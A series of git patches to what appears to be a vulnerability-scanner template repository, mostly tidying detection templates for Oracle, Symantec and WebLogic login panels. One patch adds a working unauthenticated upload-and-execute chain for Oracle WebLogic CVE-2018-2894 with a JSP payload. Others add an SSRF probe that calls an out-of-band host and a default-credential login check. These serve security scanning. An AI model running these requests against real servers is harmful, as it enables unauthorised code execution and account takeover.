Subject: [PATCH 176/339] #2636, Remove takeover tag from template --- dns/can-i-take-over-dns.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dns/can-i-take-over-dns.yaml b/dns/can-i-take-over-dns.yaml index fb4f8b6520..d8e4b48d41 100644 --- a/dns/can-i-take-over-dns.yaml +++ b/dns/can-i-take-over-dns.yaml @@ -4,7 +4,7 @@ info: name: Can I Take Over DNS - Fingerprint author: pdteam severity: info - tags: dns,ns,takeover + tags: dns,ns reference: https://github.com/indianajson/can-i-take-over-dns dns: From 35e8c3c1cf61b898ac365b21321b8ddbf107dff5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 19:50:30 +0530 Subject: [PATCH 177/339] Added complete poc --- cves/2018/CVE-2018-2894.yaml | 84 ++++++++++++++++++++++++++++++++---- 1 file changed, 75 insertions(+), 9 deletions(-) diff --git a/cves/2018/CVE-2018-2894.yaml b/cves/2018/CVE-2018-2894.yaml index a192dae23d..c89db2db55 100644 --- a/cves/2018/CVE-2018-2894.yaml +++ b/cves/2018/CVE-2018-2894.yaml @@ -2,25 +2,91 @@ id: CVE-2018-2894 info: name: Oracle WebLogic RCE - author: geeknik + author: geeknik,pdteam description: Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. - reference: https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/ severity: critical tags: cve,cve2018,oracle,weblogic,rce classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2018-2894 + reference: + - https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/ + - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2018-2894 requests: - - method: GET - path: - - "{{BaseURL}}/ws_utc/config.do" + - raw: + - | + POST /ws_utc/resources/setting/options HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80 + + - | + POST /ws_utc/resources/setting/keystore HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g + + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_name" + + {{randstr}} + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_edit_mode" + + false + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_password_front" + + + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_password" + + + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_password_changed" + + false + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_filename"; filename="{{randstr}}.jsp" + Content-Type: application/octet-stream + + <%@ page import="java.util.*,java.io.*"%> + <%@ page import="java.security.MessageDigest"%> + + <% + String cve = "CVE-2018-2894"; + MessageDigest alg = MessageDigest.getInstance("MD5"); + alg.reset(); + alg.update(cve.getBytes()); + byte[] digest = alg.digest(); + StringBuffer hashedpasswd = new StringBuffer(); + String hx; + for (int i=0;i + ------WebKitFormBoundaryuim0dyiDSPBPu31g-- + + - | + GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: id + internal: true + group: 1 + regex: + - '([0-9]+){{randstr}}' - redirects: true matchers: - type: word words: - - "* Copyright (c) 2005,2013, Oracle" - - "settings" - condition: and \ No newline at end of file + - "26ec00a3a03f6bfc5226fd121567bb58" # MD5 (CVE-2018-2894) From 29a944ea73c86a2ed3d8f8c46b82c04b5e155b71 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 20:22:03 +0530 Subject: [PATCH 178/339] payload update --- cves/2014/CVE-2014-4210.yaml | 11 ++++------- cves/2020/CVE-2020-14882.yaml | 1 + 2 files changed, 5 insertions(+), 7 deletions(-) diff --git a/cves/2014/CVE-2014-4210.yaml b/cves/2014/CVE-2014-4210.yaml index 42932519fa..df8ec6f136 100644 --- a/cves/2014/CVE-2014-4210.yaml +++ b/cves/2014/CVE-2014-4210.yaml @@ -4,7 +4,7 @@ info: name: Weblogic SSRF in SearchPublicRegistries.jsp author: princechaddha severity: medium - tags: cve,cve2014,weblogic,oracle,ssrf + tags: cve,cve2014,weblogic,oracle,ssrf,oob reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700" + - "{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}" matchers-condition: and matchers: @@ -22,9 +22,6 @@ requests: - 200 - type: word + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "Connection refused" - - "Socket Closed" - - "content-type: unknown/unknown" - part: body - condition: or + - "http" diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml index 50635623d5..382be20081 100644 --- a/cves/2020/CVE-2020-14882.yaml +++ b/cves/2020/CVE-2020-14882.yaml @@ -47,6 +47,7 @@ requests: - "\\[(font|extension|file)s\\]" condition: or part: body + - type: status status: - 200 \ No newline at end of file From e831dd4fe0f27a10d48c62875f566c9504e4b6bf Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 20:45:49 +0530 Subject: [PATCH 179/339] lint error fix --- cves/2018/CVE-2018-2894.yaml | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/cves/2018/CVE-2018-2894.yaml b/cves/2018/CVE-2018-2894.yaml index c89db2db55..c5c306ce1f 100644 --- a/cves/2018/CVE-2018-2894.yaml +++ b/cves/2018/CVE-2018-2894.yaml @@ -20,45 +20,45 @@ requests: POST /ws_utc/resources/setting/options HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - + setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80 - | POST /ws_utc/resources/setting/keystore HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g - + ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_name" - + {{randstr}} ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_edit_mode" - + false ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_password_front" - - + + ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_password" - - + + ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_password_changed" - + false ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_filename"; filename="{{randstr}}.jsp" Content-Type: application/octet-stream - + <%@ page import="java.util.*,java.io.*"%> <%@ page import="java.security.MessageDigest"%> - + <% String cve = "CVE-2018-2894"; MessageDigest alg = MessageDigest.getInstance("MD5"); - alg.reset(); + alg.reset(); alg.update(cve.getBytes()); byte[] digest = alg.digest(); StringBuffer hashedpasswd = new StringBuffer(); @@ -69,7 +69,7 @@ requests: if(hx.length() == 1){hx = "0" + hx;} hashedpasswd.append(hx); } - + out.println(hashedpasswd.toString()); %> ------WebKitFormBoundaryuim0dyiDSPBPu31g-- From b46cd37b47faf475a87c23216dd353f07e521fc2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 20:53:13 +0530 Subject: [PATCH 180/339] Added default weblogic login --- .../weblogic/weblogic-default-login.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 default-logins/weblogic/weblogic-default-login.yaml diff --git a/default-logins/weblogic/weblogic-default-login.yaml b/default-logins/weblogic/weblogic-default-login.yaml new file mode 100644 index 0000000000..310ae8dbb3 --- /dev/null +++ b/default-logins/weblogic/weblogic-default-login.yaml @@ -0,0 +1,35 @@ +id: weblogic-default-login + +info: + name: WebLogic default login + author: pdteam + severity: high + tags: default-login,weblogic + reference: https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/weak_password + +requests: + - raw: + - | + GET /console/ HTTP/1.1 + Host: {{Hostname}} + + - | + POST /console/j_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + j_username=weblogic&j_password=Oracle@123&j_character_encoding=UTF-8 + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: header + words: + - "/console/index.jsp" + - "ADMINCONSOLESESSION" + condition: and + + - type: status + status: + - 302 \ No newline at end of file From f092d5dab7fd9850b0256284354d5f567aabe64e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 21:26:20 +0530 Subject: [PATCH 181/339] Update CVE-2010-2037.yaml --- cves/2010/CVE-2010-2037.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2010/CVE-2010-2037.yaml b/cves/2010/CVE-2010-2037.yaml index 9a9b24c3e6..e3db0ee030 100644 --- a/cves/2010/CVE-2010-2037.yaml +++ b/cves/2010/CVE-2010-2037.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/34005 - https://www.cvedetails.com/cve/CVE-2010-2037 - tags: cve,cve2010,lfi + tags: cve,cve2010,lfi,joomla requests: - method: GET From 6975422e79c07d7e461784fc759da81f32b693f4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 21:27:22 +0530 Subject: [PATCH 182/339] Update oracle-business-control.yaml --- exposed-panels/oracle-business-control.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/exposed-panels/oracle-business-control.yaml b/exposed-panels/oracle-business-control.yaml index 04d90cc407..473e0db989 100644 --- a/exposed-panels/oracle-business-control.yaml +++ b/exposed-panels/oracle-business-control.yaml @@ -4,9 +4,8 @@ info: name: Oracle Commerce Business Control Center author: dhiyaneshDk severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Commerce%22 tags: oracle,login - reference: - - https://www.shodan.io/search?query=http.title%3A%22Oracle+Commerce%22 requests: - method: GET From 59c91400c6e069cb58b34d9e6bb4b045e994ffe2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 21:27:48 +0530 Subject: [PATCH 183/339] Update oracle-integrated-manager.yaml --- exposed-panels/oracle-integrated-manager.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml index 8a61b0ea64..3068208fab 100644 --- a/exposed-panels/oracle-integrated-manager.yaml +++ b/exposed-panels/oracle-integrated-manager.yaml @@ -5,8 +5,7 @@ info: author: dhiyaneshDk severity: info tags: oracle,login - reference: - - https://www.shodan.io/search?query=http.title%3A%22Oracle%28R%29+Integrated+Lights+Out+Manager%22&page=2 + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle%28R%29+Integrated+Lights+Out+Manager%22&page=2 requests: - method: GET From a90f10a4200234846a97ebfb195710d951593fa7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 21:28:24 +0530 Subject: [PATCH 184/339] Update oracle-people-enterprise.yaml --- exposed-panels/oracle-people-enterprise.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/exposed-panels/oracle-people-enterprise.yaml b/exposed-panels/oracle-people-enterprise.yaml index eba64c8a2a..8f732871c5 100644 --- a/exposed-panels/oracle-people-enterprise.yaml +++ b/exposed-panels/oracle-people-enterprise.yaml @@ -4,9 +4,8 @@ info: name: Oracle Peoplesoft Enterprise author: dhiyaneshDk severity: info - tags: oracle,login - reference: - - https://www.shodan.io/search?query=http.title%3A%22Oracle+Peoplesoft+Enterprise%22 + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Peoplesoft+Enterprise%22 + tags: oracle,login,panel requests: - method: GET From bbde06af581fa99e7ca6453115718e97e3a5d155 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 21:28:33 +0530 Subject: [PATCH 185/339] Update oracle-integrated-manager.yaml --- exposed-panels/oracle-integrated-manager.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml index 3068208fab..c18a630cb9 100644 --- a/exposed-panels/oracle-integrated-manager.yaml +++ b/exposed-panels/oracle-integrated-manager.yaml @@ -4,7 +4,7 @@ info: name: Oracle(R) Integrated Lights Out Manager author: dhiyaneshDk severity: info - tags: oracle,login + tags: oracle,login,panel reference: https://www.shodan.io/search?query=http.title%3A%22Oracle%28R%29+Integrated+Lights+Out+Manager%22&page=2 requests: From 4a68ea4346d29b4610085d31d03547c26b208580 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 21:28:44 +0530 Subject: [PATCH 186/339] Update oracle-business-control.yaml --- exposed-panels/oracle-business-control.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/oracle-business-control.yaml b/exposed-panels/oracle-business-control.yaml index 473e0db989..e5c490c80e 100644 --- a/exposed-panels/oracle-business-control.yaml +++ b/exposed-panels/oracle-business-control.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDk severity: info reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Commerce%22 - tags: oracle,login + tags: oracle,login,panel requests: - method: GET From 64df660fd6a81feca2cee877b06be9d6a45c6832 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:15:21 +0530 Subject: [PATCH 187/339] Update oracle-integrated-manager.yaml --- exposed-panels/oracle-integrated-manager.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml index c18a630cb9..4df36b9b46 100644 --- a/exposed-panels/oracle-integrated-manager.yaml +++ b/exposed-panels/oracle-integrated-manager.yaml @@ -17,6 +17,7 @@ requests: - type: word words: - 'Oracle(R) Integrated Lights Out Manager - Login' + part: body - type: status status: From 716a9a0a6db44e486ed526ff810d1c5e2f5214a1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:15:54 +0530 Subject: [PATCH 188/339] Update oracle-integrated-manager.yaml --- exposed-panels/oracle-integrated-manager.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml index 4df36b9b46..13aa0c5c1b 100644 --- a/exposed-panels/oracle-integrated-manager.yaml +++ b/exposed-panels/oracle-integrated-manager.yaml @@ -4,8 +4,8 @@ info: name: Oracle(R) Integrated Lights Out Manager author: dhiyaneshDk severity: info - tags: oracle,login,panel reference: https://www.shodan.io/search?query=http.title%3A%22Oracle%28R%29+Integrated+Lights+Out+Manager%22&page=2 + tags: oracle,login,panel requests: - method: GET From abaac750f928a47b03278ee8bebae9ce41ffe52c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:19:01 +0530 Subject: [PATCH 189/339] Update oracle-integrated-manager.yaml --- exposed-panels/oracle-integrated-manager.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml index 13aa0c5c1b..c87585cf6e 100644 --- a/exposed-panels/oracle-integrated-manager.yaml +++ b/exposed-panels/oracle-integrated-manager.yaml @@ -22,3 +22,10 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'id="hostname">([a-z0-9-]+)<\/span><\/td>' From 4512b1c88a67220afd4060b55661abfc8f709d75 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:34:36 +0530 Subject: [PATCH 190/339] Update and rename symantec-ewep.yaml to symantec-ewep-detect.yaml --- .../{symantec-ewep.yaml => symantec-ewep-detect.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename exposed-panels/{symantec-ewep.yaml => symantec-ewep-detect.yaml} (75%) diff --git a/exposed-panels/symantec-ewep.yaml b/exposed-panels/symantec-ewep-detect.yaml similarity index 75% rename from exposed-panels/symantec-ewep.yaml rename to exposed-panels/symantec-ewep-detect.yaml index 517d468a5c..f735ab3604 100644 --- a/exposed-panels/symantec-ewep.yaml +++ b/exposed-panels/symantec-ewep-detect.yaml @@ -1,10 +1,10 @@ -id: symantec-ewep +id: symantec-ewep-detect info: - name: Detect Symantec Encryption Web Email Protection + name: Symantec Encryption Web Email Protection Detect author: johnk3r severity: info - tags: panel + tags: panel,symantec requests: - method: GET From f1f59f6fe5fb9fb6c3d727e62879af216a66bc33 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:44:14 +0530 Subject: [PATCH 191/339] Create symantec-endpoint-manager.yaml --- .../symantec/symantec-endpoint-manager.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/symantec/symantec-endpoint-manager.yaml diff --git a/exposed-panels/symantec/symantec-endpoint-manager.yaml b/exposed-panels/symantec/symantec-endpoint-manager.yaml new file mode 100644 index 0000000000..f90d195530 --- /dev/null +++ b/exposed-panels/symantec/symantec-endpoint-manager.yaml @@ -0,0 +1,24 @@ +id: symantec-endpoint-manager + +info: + name: Symantec Endpoint Protection Manager + author: princechaddha + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Endpoint+Protection+Manager%22 + tags: symantec,panel,login + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "Symantec Endpoint Protection Manager" + part: body + + - type: status + status: + - 200 From 2478812b3fa8fab9651fbcae64ec1b18e40d32de Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:46:25 +0530 Subject: [PATCH 192/339] Update and rename exposed-panels/symantec-ewep-detect.yaml to exposed-panels/symantec/symantec-ewep-detect.yaml --- exposed-panels/{ => symantec}/symantec-ewep-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename exposed-panels/{ => symantec}/symantec-ewep-detect.yaml (74%) diff --git a/exposed-panels/symantec-ewep-detect.yaml b/exposed-panels/symantec/symantec-ewep-detect.yaml similarity index 74% rename from exposed-panels/symantec-ewep-detect.yaml rename to exposed-panels/symantec/symantec-ewep-detect.yaml index f735ab3604..7461ae8a06 100644 --- a/exposed-panels/symantec-ewep-detect.yaml +++ b/exposed-panels/symantec/symantec-ewep-detect.yaml @@ -4,7 +4,7 @@ info: name: Symantec Encryption Web Email Protection Detect author: johnk3r severity: info - tags: panel,symantec + tags: panel,symantec,login requests: - method: GET @@ -15,7 +15,7 @@ requests: matchers: - type: word words: - - "Symantec Corporation. All Rights Reserved" + - "Symantec Encryption Server: Web Email Protection - Login" part: body - type: status From fc041660f7610265b9287b45a956239430dc2c05 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:47:12 +0530 Subject: [PATCH 193/339] Update and rename symantec-endpoint-manager.yaml to symantec-epm-login.yaml --- .../{symantec-endpoint-manager.yaml => symantec-epm-login.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename exposed-panels/symantec/{symantec-endpoint-manager.yaml => symantec-epm-login.yaml} (94%) diff --git a/exposed-panels/symantec/symantec-endpoint-manager.yaml b/exposed-panels/symantec/symantec-epm-login.yaml similarity index 94% rename from exposed-panels/symantec/symantec-endpoint-manager.yaml rename to exposed-panels/symantec/symantec-epm-login.yaml index f90d195530..4b06e8b789 100644 --- a/exposed-panels/symantec/symantec-endpoint-manager.yaml +++ b/exposed-panels/symantec/symantec-epm-login.yaml @@ -1,4 +1,4 @@ -id: symantec-endpoint-manager +id: symantec-epm-login info: name: Symantec Endpoint Protection Manager From 25037e4bb68b3727ae36fa6d1c5c22683320af1d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:47:36 +0530 Subject: [PATCH 194/339] Update and rename symantec-ewep-detect.yaml to symantec-ewep-login.yaml --- .../{symantec-ewep-detect.yaml => symantec-ewep-login.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename exposed-panels/symantec/{symantec-ewep-detect.yaml => symantec-ewep-login.yaml} (82%) diff --git a/exposed-panels/symantec/symantec-ewep-detect.yaml b/exposed-panels/symantec/symantec-ewep-login.yaml similarity index 82% rename from exposed-panels/symantec/symantec-ewep-detect.yaml rename to exposed-panels/symantec/symantec-ewep-login.yaml index 7461ae8a06..954f4b1e22 100644 --- a/exposed-panels/symantec/symantec-ewep-detect.yaml +++ b/exposed-panels/symantec/symantec-ewep-login.yaml @@ -1,7 +1,7 @@ -id: symantec-ewep-detect +id: symantec-ewep-login info: - name: Symantec Encryption Web Email Protection Detect + name: Symantec Encryption Web Email Protection author: johnk3r severity: info tags: panel,symantec,login From 9da0058ecda05a2a6558c13e199d795fad37270b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:51:15 +0530 Subject: [PATCH 195/339] Create symantec-dlp-login.yaml --- .../symantec/symantec-dlp-login.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/symantec/symantec-dlp-login.yaml diff --git a/exposed-panels/symantec/symantec-dlp-login.yaml b/exposed-panels/symantec/symantec-dlp-login.yaml new file mode 100644 index 0000000000..5034c5453c --- /dev/null +++ b/exposed-panels/symantec/symantec-dlp-login.yaml @@ -0,0 +1,24 @@ +id: symantec-dlp-login + +info: + name: Symantec Data Loss Prevention + author: princechaddha + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Endpoint+Protection+Manager%22 + tags: symantec,panel,login + +requests: + - method: GET + path: + - '{{BaseURL}}/ProtectManager/Logon' + + matchers-condition: and + matchers: + - type: word + words: + - "Symantec Data Loss Prevention" + part: body + + - type: status + status: + - 200 From a6f9ff01dffb179827e5a98a793896ed0208f9ca Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:55:00 +0530 Subject: [PATCH 196/339] Create symantec-pgp-global-directory.yaml --- .../symantec-pgp-global-directory.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/symantec/symantec-pgp-global-directory.yaml diff --git a/exposed-panels/symantec/symantec-pgp-global-directory.yaml b/exposed-panels/symantec/symantec-pgp-global-directory.yaml new file mode 100644 index 0000000000..15f11d8c65 --- /dev/null +++ b/exposed-panels/symantec/symantec-pgp-global-directory.yaml @@ -0,0 +1,24 @@ +id: symantec-pgp-global-directory + +info: + name: Symantec PGP Global Directory + author: princechaddha + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22PGP+Global+Directory%22 + tags: symantec,panel + +requests: + - method: GET + path: + - '{{BaseURL}}/vkd/GetWelcomeScreen.event' + + matchers-condition: and + matchers: + - type: word + words: + - "PGP Global Directory" + part: body + + - type: status + status: + - 200 From 85762d9986de8fca77a53ab4db517c771e7386c7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:55:21 +0530 Subject: [PATCH 197/339] Update symantec-dlp-login.yaml --- exposed-panels/symantec/symantec-dlp-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/symantec/symantec-dlp-login.yaml b/exposed-panels/symantec/symantec-dlp-login.yaml index 5034c5453c..b4e614e6e8 100644 --- a/exposed-panels/symantec/symantec-dlp-login.yaml +++ b/exposed-panels/symantec/symantec-dlp-login.yaml @@ -4,7 +4,7 @@ info: name: Symantec Data Loss Prevention author: princechaddha severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Endpoint+Protection+Manager%22 + reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Data+Loss+Prevention%22 tags: symantec,panel,login requests: From 3a88fbd0c96f9fd8cfc16f02613a902f69e80e7b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:56:10 +0530 Subject: [PATCH 198/339] Update symantec-ewep-login.yaml --- exposed-panels/symantec/symantec-ewep-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/symantec/symantec-ewep-login.yaml b/exposed-panels/symantec/symantec-ewep-login.yaml index 954f4b1e22..bf1d69c06b 100644 --- a/exposed-panels/symantec/symantec-ewep-login.yaml +++ b/exposed-panels/symantec/symantec-ewep-login.yaml @@ -4,6 +4,7 @@ info: name: Symantec Encryption Web Email Protection author: johnk3r severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Encryption+Server%3A+Web+Email+Protection+-+Login%22 tags: panel,symantec,login requests: From 7910a9492e91dc18d8aa7f03b0427c8d4c2265f3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:59:03 +0530 Subject: [PATCH 199/339] Update oracle-dbass-detect.yaml --- technologies/oracle-dbass-detect.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/technologies/oracle-dbass-detect.yaml b/technologies/oracle-dbass-detect.yaml index 2c6406bb5d..2a2c6a7b78 100644 --- a/technologies/oracle-dbass-detect.yaml +++ b/technologies/oracle-dbass-detect.yaml @@ -1,18 +1,21 @@ -id: oracle-DBaaS Monitor-service +id: oracle-dbass-detect info: - name: DBaaS Monitor Detect + name: Oracle DBaaS Monitor Detect author: pussycat0x severity: info tags: oracle,tech + requests: - method: GET path: - '{{BaseURL}}/dbaas_monitor/login' + matchers-condition: and matchers: - type: word words: - 'DBaaS Monitor' + - type: status status: - - 200 \ No newline at end of file + - 200 From e4a65e4f85d5dbd270019e322d955f0314ab84d4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:00:40 +0530 Subject: [PATCH 200/339] Update and rename technologies/oracle-dbcs.yaml to technologies/oracle/oracle-dbcs.yaml --- technologies/{ => oracle}/oracle-dbcs.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) rename technologies/{ => oracle}/oracle-dbcs.yaml (84%) diff --git a/technologies/oracle-dbcs.yaml b/technologies/oracle/oracle-dbcs.yaml similarity index 84% rename from technologies/oracle-dbcs.yaml rename to technologies/oracle/oracle-dbcs.yaml index d1c8891335..4dd45891c6 100644 --- a/technologies/oracle-dbcs.yaml +++ b/technologies/oracle/oracle-dbcs.yaml @@ -1,19 +1,23 @@ -id: oracle-database-service +id: oracle-dbcs info: name: Oracle Database as a Service author: pussycat0x severity: info reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22 tags: oracle,tech + requests: - method: GET path: - '{{BaseURL}}' + matchers-condition: and matchers: - type: word words: - 'Oracle Database as a Service' + part: body + - type: status status: - - 200 \ No newline at end of file + - 200 From c79276349f8172be9865f300fe922a485bf5bc11 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:01:04 +0530 Subject: [PATCH 201/339] Rename technologies/oracle-dbass-detect.yaml to technologies/oracle/oracle-dbass-detect.yaml --- technologies/{ => oracle}/oracle-dbass-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => oracle}/oracle-dbass-detect.yaml (100%) diff --git a/technologies/oracle-dbass-detect.yaml b/technologies/oracle/oracle-dbass-detect.yaml similarity index 100% rename from technologies/oracle-dbass-detect.yaml rename to technologies/oracle/oracle-dbass-detect.yaml From 6cd0920ed0fbe517d4e75aa399f962539dc2d613 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:01:55 +0530 Subject: [PATCH 202/339] Update and rename technologies/default-oracle-application-page.yaml to technologies/oracle/default-oracle-application-page.yaml --- technologies/{ => oracle}/default-oracle-application-page.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) rename technologies/{ => oracle}/default-oracle-application-page.yaml (99%) diff --git a/technologies/default-oracle-application-page.yaml b/technologies/oracle/default-oracle-application-page.yaml similarity index 99% rename from technologies/default-oracle-application-page.yaml rename to technologies/oracle/default-oracle-application-page.yaml index 263c5493f5..1cc6853a67 100644 --- a/technologies/default-oracle-application-page.yaml +++ 